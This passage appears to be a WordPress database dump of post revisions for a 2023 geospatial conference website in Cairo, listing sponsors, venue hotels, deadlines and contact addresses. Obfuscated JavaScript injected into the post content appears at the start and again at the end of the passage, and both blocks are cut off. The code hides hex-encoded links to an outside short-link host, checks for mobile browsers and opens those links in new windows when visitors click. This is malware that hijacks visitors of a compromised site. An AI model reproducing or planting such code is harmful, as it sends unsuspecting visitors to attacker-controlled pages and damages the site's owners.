Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-18 13:47:56','2023-06-18 13:47:56','',3066,'https://gsw2023.com/?p=4711',0,'revision','',0),
(4712,1,'2023-06-18 13:49:18','2023-06-18 13:49:18','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739986286{margin-top: -35px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1687094969343{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\'